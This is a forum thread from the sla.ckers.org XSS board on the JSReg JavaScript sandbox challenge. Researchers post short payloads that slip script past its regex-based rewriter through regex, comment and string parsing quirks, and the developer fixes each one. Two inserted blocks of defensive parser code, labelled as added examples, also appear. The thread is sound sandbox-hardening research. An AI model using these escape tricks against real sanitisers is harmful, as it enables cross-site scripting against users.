Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: May 06, 2010 07:57AM

@kangax

Thanks! and fixed.

There is no workaround for block statements followed by arrays though:-
{'I am a block statement'}['arrghh really an array']

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: JSReg sandbox challenge
Posted by: kangax
Date: May 06, 2010 02:39PM

Another bug :)

[/x]/]; // throws Error but shouldn't

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: May 07, 2010 10:34AM

Fixed that one and Mario's crazy regex too :-

[/[[[[[x]]]]]/]

Update...
I've put the array change live now, I may revert it back if there's a severe bug but at the moment it looks ok

Edited 1 time(s). Last edit at 05/08/2010 01:56PM by Gareth Heyes.

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: May 14, 2010 04:49AM

I've reworked arrays and objects completely. I now use an Array translator that is scanned before the code is converted. So x=[]; gets rewritten to x=A() before it is converted further. I also removed the previous crappy loop code and created a separate for..in checker which allows the following code to work:-

o={a:1,b:2};
for(i in o)alert(i+'='+o[i])

Phew. Hopefully the translator should detect all arrays and closing ] correctly.

Re: JSReg sandbox challenge
Posted by: kangax
Date: May 14, 2010 08:04AM

Looks like your $A$ — the one that's used for array creation — leaks into the rest of the user code:

function A(){ return 1 }
[A][0](); // should return 1, not throw error

Oh, and I assume experimental array support is in the main app now, right? (http://www.businessinfo.co.uk/labs/jsreg/arrays/jsreg.html seems to be gone)

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: May 14, 2010 08:46AM

@kangax

Yeah, I dropped that method; the problem was that assignments to a function call created errors. This time I parse them first so I can use leftContext to identify the previous character, then I track each open/close and assign them a counter. This makes nested arrays much easier to match.

I use $A$ as a special array constructor, it can't be a constant "A" as the main code rewrite hasn't been performed yet. I could use a higher ascii character that wouldn't affect user defined code. Any other suggestions?

Re: JSReg sandbox challenge
Posted by: kangax
Date: May 14, 2010 08:18PM

@Gareth
I see. Well, you could always choose an identifier consisting of random characters, to lower the chance of collisions. Create it dynamically like this, for example — '$' + (Math.random() + '').slice(2)

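An added example (not JSReg's own code) of the two ideas in the last two posts: the character to the left of "[" (the leftContext idea) separates an array literal from a subscript, a stack pairs nested brackets, and a randomly generated constructor name as kangax suggests stops user code from defining the name first. The function names and the "$A$" default are placeholders of mine, and the code assumes strings, comments and regex literals have already been tokenised out.

```javascript
// Added example, not JSReg's own code: rewrite array literals to a call of a
// reserved constructor. The character left of "[" decides literal vs.
// subscript; a stack pairs nested brackets. Strings, comments and regex
// literals are assumed to have been tokenised out already; the constructor
// name "$A$" is a placeholder.
const KEYWORDS = /^(return|typeof|in|of|case|throw|void|delete|new|else|do)$/;

function isLiteralStart(code, i) {
  let j = i - 1;
  while (j >= 0 && /\s/.test(code[j])) j--;      // previous significant char
  if (j < 0) return true;                        // "[" at start of program
  const prev = code[j];
  if (prev === ')' || prev === ']') return false; // f()[0], a[0][1]
  if (!/[\w$]/.test(prev)) return true;           // after "=", ",", "(", ";"
  let k = j;
  while (k >= 0 && /[\w$]/.test(code[k])) k--;    // read the word before "["
  return KEYWORDS.test(code.slice(k + 1, j + 1)); // "return [1]" vs "x[1]"
}

function rewriteArrays(code, ctor = '$A$') {
  const stack = [];            // true = array literal, false = subscript
  let out = '';
  for (let i = 0; i < code.length; i++) {
    const c = code[i];
    if (c === '[') {
      const literal = isLiteralStart(code, i);
      stack.push(literal);
      out += literal ? ctor + '(' : '[';
    } else if (c === ']') {
      if (!stack.length) throw new SyntaxError('unbalanced "]" at ' + i);
      out += stack.pop() ? ')' : ']';
    } else {
      out += c;
    }
  }
  if (stack.length) throw new SyntaxError('unclosed "["');
  return out;
}

// A fresh, hard-to-guess constructor name per rewrite (kangax's suggestion),
// so sandboxed code cannot predefine the name and capture every array.
function freshCtorName() {
  return '$' + (Math.random() + '').slice(2);
}
```

Run rewriteArrays(source, freshCtorName()) and bind that name to the sandbox's array constructor before the rewritten code executes.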
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 09, 2010 10:11AM

Ok bumped the version up with a load of fixes and improvements

* Added Prototype support
* Constant support in IE8, Opera, Safari, Chrome, Firefox enabling me to freeze native stuff
* Made a special token to enable static array literals
* Fixed Array literal overwrite vector

Opera is nuts: it supports const x=1 but allows you to modify it! WTF.
Anyway I think most of the language is supported now except toString/valueOf on literals which I was close to supporting but <=IE7 doesn't support setters or constants so there was no 100% way of making it safe :(

I still need to optimize the code a lot and sort the comment parser and make a line by line extractor for speed. But hey I'm doing this in my spare time :) Also next up is a sandbox framework which will be similar to JQuery but in a sandboxed environment. As usual any comments or bug reports are always very welcome and the first one to break it will get a custom Hackvertor t-shirt

Re: JSReg sandbox challenge
Posted by: LeverOne
Date: March 26, 2011 04:39AM

Well, I finally found the time.

I was shocked ... I'm not going to disclose everything that I've found, because tomorrow Gareth Heyes will scream that LeverOne can't bypass JSReg. :) I don't want that.

But here's a small sample:

1.1

/lo\[/;alert(parent.location);/lo/;

Yeah, it's very difficult ... Bullshit!

LeverOne

----------------------
~Veritas~



Edited 1 time(s). Last edit at 03/28/2011 07:43AM by LeverOne.

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 27, 2011 07:39AM

@LeverOne

Hehe awesome! :D thanks! Soroush also found a hole too :)

Update...
Fixed it for now but I can see how more pain can be brought to me :) so I'll try and look into a more defensive fix when I have time

Edited 1 time(s). Last edit at 03/28/2011 06:53AM by Gareth Heyes.

Re: JSReg sandbox challenge
Posted by: LeverOne
Date: March 28, 2011 07:39AM

1.2

/lo\\/;alert(parent.location);/lo/;

Edited 1 time(s). Last edit at 03/28/2011 07:44AM by LeverOne.

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 28, 2011 09:29AM

@LeverOne

Awesome again! Damn detecting regexes is tricky.
I've simplified the regex check, added a syntax check when matched and removed support for crazy unescaped "/" within character classes.

Thanks for beating the crap out of JSReg :) I'm worried you have a pile of these xD

BTW when I have some spare dosh I'll sort you out some prizes for this awesome work, along with the other people who broke jsreg. + a follow up blog post crediting you as well.

Edited 2 time(s). Last edit at 03/28/2011 09:40AM by Gareth Heyes.

Re: JSReg sandbox challenge
Posted by: LeverOne
Date: March 28, 2011 10:19AM

1.3

/[/;lo="]/;alert(parent.location)//";


Quote

I'm worried you have a pile of these

Yeah, I have :)

Quote

I'll sort you out some prizes for this awesome work

It isn't necessary. I'm thinking in the future to exchange my pointless time for pointless time of yours. ;))

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 28, 2011 10:52AM

Quote

1.3

/[/;lo="]/;alert(parent.location)//";

This should be caught as the regex syntax check will be triggered. Did you shift refresh ;)

Quote

It isn't necessary. I'm thinking in the future to exchange my pointless time for pointless time of yours. ;))

That's cool :)

Re: JSReg sandbox challenge
Posted by: LeverOne
Date: March 28, 2011 11:18AM

Quote

This should be caught as the regex syntax check will be triggered. Did you shift refresh ;)

try on Opera...

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 28, 2011 11:36AM

Quote

try on Opera...

Damn it I hate Opera

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 28, 2011 12:29PM

So now, yeah I validate opening and closing character classes manually. Hopefully closed now.

Re: JSReg sandbox challenge
Posted by: LeverOne
Date: March 28, 2011 12:37PM

1.4

/lo\//,/;lo=/;alert(parent.location)//;

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 28, 2011 01:08PM

@LeverOne

Ok now I check forward slashes too LOL.
Man you have more? It's almost convincing me to abandon regex as a rewriter and use char by char parsing.

Update
Damn, I broke it myself, hmmmmm, got another fix in the pipeline

Update 2
Ok, I think it's fixed; the problem was the "," being eaten by the previous match. Now I use lookahead instead and look for it at the end of the string instead of the beginning.

Edited 2 time(s). Last edit at 03/28/2011 01:37PM by Gareth Heyes.

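A character-by-character scanner of the kind Gareth is considering above, added here as an example and not code from JSReg: it finds string, comment and regex literals with the same rules a JS engine applies (the previous significant character decides regex vs. division, backslash escapes and "[...]" classes are tracked, a newline ends an unterminated literal), which is the boundary a rewriter has to agree with the engine on. The function names are my own; the sample inputs in the test are the ones posted in this thread.

```javascript
// Added example, not JSReg's own code: a character-by-character scanner that
// finds string, comment and regex literals the way a JS engine does, so a
// rewriter can skip them instead of guessing with a regex. A "/" starts a
// regex only when the previous significant character cannot end an operand;
// backslash escapes and "[...]" classes are tracked inside the literal.
function prevSignificant(code, i) {
  let j = i - 1;
  while (j >= 0 && /\s/.test(code[j])) j--;
  return j < 0 ? '' : code[j];
}

function regexCanStart(code, i) {
  // After an identifier, number, ")" or "]" a "/" is the division operator
  // (keywords such as "return" and the ")" of an if(...) are not special-cased).
  return !/[\w$)\]]/.test(prevSignificant(code, i));
}

function scanLiterals(code) {
  const found = [];
  for (let i = 0; i < code.length; i++) {
    const c = code[i], n = code[i + 1];
    let type, end = -1;
    if (c === '/' && n === '*') {                        // block comment
      type = 'comment';
      const close = code.indexOf('*/', i + 2);
      end = close < 0 ? code.length - 1 : close + 1;
    } else if (c === '/' && n === '/') {                 // line comment
      type = 'comment';
      const nl = code.indexOf('\n', i);
      end = nl < 0 ? code.length - 1 : nl - 1;
    } else if (c === '"' || c === "'" || (c === '/' && regexCanStart(code, i))) {
      type = c === '/' ? 'regex' : 'string';
      let inClass = false;
      for (let j = i + 1; j < code.length && end < 0; j++) {
        const d = code[j];
        if (d === '\\') j++;                             // skip escaped char
        else if (d === '\n') break;                      // cannot span lines
        else if (type === 'regex' && d === '[') inClass = true;
        else if (type === 'regex' && d === ']') inClass = false;
        else if (d === c && !inClass) end = j;           // closing delimiter
      }
      if (end < 0) throw new SyntaxError('unterminated ' + type + ' at ' + i);
    }
    if (end >= 0) { found.push({ type, text: code.slice(i, end + 1) }); i = end; }
  }
  return found;
}

function literalTexts(code) { return scanLiterals(code).map(t => t.text); }
```

A rewriter built on this sees exactly the literal boundaries the engine sees, and rejects (throws on) what the engine rejects, such as a newline inside a regex literal.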
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: March 28, 2011 01:46PM

1.5

lo=''/**/;alert(parent.location)//';

Edited 1 time(s). Last edit at 03/28/2011 02:43PM by LeverOne.

Re: JSReg sandbox challenge
Posted by: SW
Date: March 29, 2011 02:14AM

/**/alert/**/(parent/**/.location/**/);

Re: JSReg sandbox challenge
Posted by: SW
Date: March 29, 2011 02:40AM

/*//*/alert(parent.location)//



Edited 1 time(s). Last edit at 03/29/2011 04:11AM by SW.

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 29, 2011 04:48AM

@LeverOne @sw

Thanks and fixed

Re: JSReg sandbox challenge
Posted by: LeverOne
Date: March 29, 2011 06:12AM

1.6

/[;
lo="]/&alert(parent.location+"");


First line should be without %20.

Edited 1 time(s). Last edit at 03/29/2011 06:41AM by LeverOne.

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 29, 2011 06:28AM

:O

That's awesome! Opera is nuts!

Update
and fixed, I just removed the line rewriter since the regexes are better now; it's still pretty fast

Edited 1 time(s). Last edit at 03/29/2011 07:15AM by Gareth Heyes.

Re: JSReg sandbox challenge
Posted by: LeverOne
Date: March 29, 2011 07:21AM

1.7

/lo/+/'//alert(parent.location)//';

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 29, 2011 08:05AM

@LeverOne

Fixed, I changed the regex "right" to use lookahead instead of matching characters. Man you are beating up jsreg good, any more? :D

Re: JSReg sandbox challenge
Posted by: LeverOne
Date: March 29, 2011 08:28AM

OK, relax a while.
And yes, I have more of course. :P

Edited 1 time(s). Last edit at 03/29/2011 08:28AM by LeverOne.

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 29, 2011 08:39AM

hahaha yeah that's right, give me a false sense of security, thanks for the break :)

Re: JSReg sandbox challenge
Posted by: LeverOne
Date: March 30, 2011 05:42AM

1.8

/lo='/?alert(parent.location):''
